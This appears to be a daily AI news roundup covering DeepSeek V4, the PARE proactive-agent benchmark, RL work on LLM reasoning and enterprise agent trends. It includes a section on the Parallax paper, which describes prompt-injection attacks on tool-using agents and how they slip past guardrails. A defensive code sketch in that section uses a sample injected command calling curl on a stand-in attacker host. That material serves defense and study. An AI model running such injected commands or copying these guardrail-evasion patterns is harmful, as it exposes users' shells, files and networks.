The past 24 hours brought a measured pace of AI news. No blockbuster foundation model launch dominated headlines, but the day delivered a notable open-weight release and several research results on agentic systems. Together they point to a continued shift toward more accessible, proactive, and secure AI. This daily roundup covers an affordable open-weight model challenging proprietary leaders, new frameworks for evaluating and securing agents, and reinforcement-learning work on LLM reasoning, along with what each could mean for multimodal and agentic AI in 2026.

DeepSeek V4 Open-Weight Release Advances Agentic Capabilities at Lower Cost

Chinese AI lab DeepSeek unveiled its latest iteration, DeepSeek V4 (including V4 Flash and V4 Pro variants), on April 25, 2026. This open-weight model emphasizes coding, reasoning, and agentic tasks, with the Pro-Max version reported as competitive with leading U.S. models on benchmarks like Terminal-Bench 2.0 and SWE-bench Verified. It pairs strong agentic scores with significantly lower inference costs, often a fraction of those of proprietary alternatives, and its open-weight distribution allows free download and customization.

This release exemplifies the growing emphasis on open-weight models at the frontier. Community-driven fine-tuning could follow quickly, accelerating adoption in resource-constrained environments and enabling specialized agentic workflows. Cost-effective open-weight options could also intensify global competition by widening access to near-frontier performance and pressuring closed models to innovate faster. However, the model still trails top U.S. offerings like GPT-5.5 by a small margin in certain areas, so a gap with the frontier persists.

Source: “DeepSeek’s long-awaited new model fails to narrow U.S. lead in AI,” The Japan Times.

PARE Framework Introduces Robust Evaluation for Proactive AI Agents

Fresh research shared on April 25 spotlighted PARE, a framework for evaluating proactive AI agents, which anticipate user needs before receiving explicit instructions. PARE models applications as finite state machines with stateful navigation, and its benchmark, PARE-Bench, tests 143 diverse tasks across communication, productivity, and lifestyle domains. It focuses on context observation, goal inference, intervention timing, and multi-app orchestration, areas where traditional benchmarks fall short because they treat apps as simple tool-calling APIs.
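To make the finite-state-machine idea concrete, here is a minimal sketch of an app whose available actions depend on the screen it is currently showing, in contrast to a flat list of always-callable tools. This is an illustration only and not PARE's actual interface: the class `AppStateMachine`, the helper `make_mail_app`, and the toy email states and actions are all hypothetical.

```python
from dataclasses import dataclass, field


@dataclass
class AppStateMachine:
    """Hypothetical app modeled as a finite state machine (not PARE's real API)."""

    # transitions[state][action] -> next state
    transitions: dict[str, dict[str, str]]
    state: str
    history: list[str] = field(default_factory=list)

    def available_actions(self) -> list[str]:
        # Only actions defined for the current screen are valid.
        return sorted(self.transitions.get(self.state, {}))

    def step(self, action: str) -> str:
        # Reject actions that the current screen does not expose.
        if action not in self.transitions.get(self.state, {}):
            raise ValueError(f"{action!r} is not available in state {self.state!r}")
        self.history.append(self.state)
        self.state = self.transitions[self.state][action]
        return self.state


def make_mail_app() -> AppStateMachine:
    # Toy email app (assumed for illustration): inbox, thread view, draft editor.
    return AppStateMachine(
        transitions={
            "inbox": {"open_thread": "thread", "compose": "draft"},
            "thread": {"reply": "draft", "back": "inbox"},
            "draft": {"send": "inbox", "discard": "inbox"},
        },
        state="inbox",
    )
```

In this toy model an agent cannot call `send` from the inbox; it first has to navigate to a draft, which is the kind of stateful navigation a flat tool-calling API hides.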

This work addresses a core challenge in agentic AI: building systems that act autonomously yet reliably. PARE gives researchers a principled benchmark for iterating on proactive behaviors, which could lead to more intuitive AI assistants in enterprise and consumer settings. Agents that handle real-world workflows this way could reduce user friction and integrate more smoothly into daily operations. As frontier models move toward greater autonomy, frameworks like PARE will be important for checking both safety and effectiveness.

Source: DAIR.AI discussion of PARE proactive agents paper (April 25, 2026).

Parallax Paper Exposes Architectural Vulnerabilities in AI Agent Guardrails

Also highlighted on April 25, the Parallax research paper reveals fundamental flaws in current AI agent security architectures. In the study, an agent was granted access to a researcher’s shell, files, and network. The results showed that safety guardrails, often assumed to separate instructions from data, are ineffective because the underlying models process both through shared attention mechanisms. Prompt injection success rates remain high, with attacks propagating across multi-agent systems and worsening over long sessions.

The analysis warns that without architectural separation between thinking and acting, even enterprise-grade agents remain vulnerable. Proposed directions include physically isolated reasoning layers and improved evaluation protocols. The stakes are high: as agentic AI scales into domains like finance and healthcare, addressing these risks will be critical to maintaining trust. The research adds to the push for frontier models that prioritize security alongside capability.
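The separation between thinking and acting can be illustrated with a small sketch. It assumes a design in which the reasoning side may only emit structured proposals, and a separate executor checks them against a policy fixed before any untrusted text is read. The names `ProposedAction`, `Executor`, and `compromised_reasoner` are hypothetical and not taken from the Parallax paper, and the separation shown is logical and in-process, not the physical isolation the paper calls for.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ProposedAction:
    tool: str
    argument: str


class Executor:
    """Hypothetical acting layer: it sees structured proposals, never prompts."""

    def __init__(self, allowed_tools):
        # The policy is fixed at construction time; model output cannot change it.
        self._allowed_tools = frozenset(allowed_tools)

    def run(self, action: ProposedAction) -> str:
        if action.tool not in self._allowed_tools:
            return "blocked"
        # A real system would dispatch to the tool here; this sketch only reports it.
        return f"ran {action.tool}"


def compromised_reasoner(untrusted_text: str) -> ProposedAction:
    # Stand-in for a model that has been successfully prompt-injected:
    # it proposes whatever the untrusted text asks for ("tool: argument").
    tool, _, argument = untrusted_text.partition(":")
    return ProposedAction(tool=tool.strip(), argument=argument.strip())
```

With `Executor({"read_calendar"})`, a proposal derived from `"shell: curl attacker.example"` is blocked while `"read_calendar: today"` runs. The point of the sketch is that the allowlist holds even when the reasoning step is fully compromised, because enforcement does not depend on the model telling instructions apart from data.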

Source: Parallax paper discussion via AI researcher posts (April 25, 2026).

ICLR 2026 Advances KL-Regularized Policy Gradients for Superior LLM Reasoning

ICLR 2026 presentations on April 25 featured work on scaling KL-regularized policy gradient algorithms for LLM reasoning. The paper “On the Design of KL-Regularized Policy Gradient Algorithms for LLM Reasoning” reports that refined formulations of REINFORCE and KL penalties yield more stable training for complex reasoning tasks, with models like V4 and V3.2 reportedly already adopting corrected approaches.
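For readers unfamiliar with the setup, the sketch below shows the textbook form of a KL-regularized policy gradient on a toy problem. It does not reproduce the paper's specific formulations. It assumes a three-action softmax policy, the standard objective of expected reward minus beta times KL(pi || pi_ref), and exact expectations instead of sampled rollouts. All function names and parameter values are illustrative.

```python
import math


def softmax(logits):
    m = max(logits)  # subtract the max for numerical stability
    exps = [math.exp(z - m) for z in logits]
    total = sum(exps)
    return [e / total for e in exps]


def kl_regularized_gradient(logits, rewards, ref_probs, beta):
    """Exact gradient of E_pi[r] - beta * KL(pi || pi_ref) w.r.t. the logits."""
    probs = softmax(logits)
    # KL-shaped reward: r(a) - beta * log(pi(a) / pi_ref(a)).
    shaped = [r - beta * math.log(p / q) for r, p, q in zip(rewards, probs, ref_probs)]
    # Subtracting the policy-weighted mean plays the role of a REINFORCE baseline.
    baseline = sum(p * s for p, s in zip(probs, shaped))
    return [p * (s - baseline) for p, s in zip(probs, shaped)]


def train(rewards, ref_probs, beta=0.5, lr=0.5, steps=2000):
    # Plain gradient ascent on the logits, starting from a uniform policy.
    logits = [0.0] * len(rewards)
    for _ in range(steps):
        grad = kl_regularized_gradient(logits, rewards, ref_probs, beta)
        logits = [z + lr * g for z, g in zip(logits, grad)]
    return softmax(logits)


def closed_form_optimum(rewards, ref_probs, beta):
    # Known maximizer of this objective: pi*(a) proportional to pi_ref(a) * exp(r(a) / beta).
    weights = [q * math.exp(r / beta) for r, q in zip(rewards, ref_probs)]
    total = sum(weights)
    return [w / total for w in weights]
```

Comparing `train(rewards, ref_probs)` with `closed_form_optimum(rewards, ref_probs, 0.5)` is a quick sanity check: the KL term keeps the learned policy anchored to the reference instead of collapsing onto the single highest-reward action, which is the stabilizing effect such penalties are meant to provide.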

These insights promise better alignment and performance in frontier AI models, particularly for agentic workflows requiring long-horizon planning. Prospects include faster convergence when training open-source systems and reduced hallucinations in multimodal setups. If the results hold at scale, they could make new model releases more reliable in real-time decision-making and scientific applications.

Source: ICLR 2026 paper presentation and researcher discussions (April 25, 2026).



Enterprise Agentic AI Landscape and Multi-Agent Orchestration Trends

Complementing the above, visuals and analyses shared on April 25 underscore the 2026 enterprise shift toward trusted yet flexible agentic AI systems. The diagrams highlight a transition from human-in-the-loop operation to supervised, bounded autonomy, with multi-agent orchestration protocols like MCP (Model Context Protocol) enabling integration across legacy systems.

These elements signal strong development prospects for hybrid systems that balance innovation with governance. Future implications point to widespread AI advancements in operational efficiency, with open-weight models like DeepSeek V4 playing a pivotal role in reducing vendor dependency.

Source: Aggregated frontier AI discussions and visuals (April 25, 2026).

Stay tuned for more daily cutting-edge AI updates.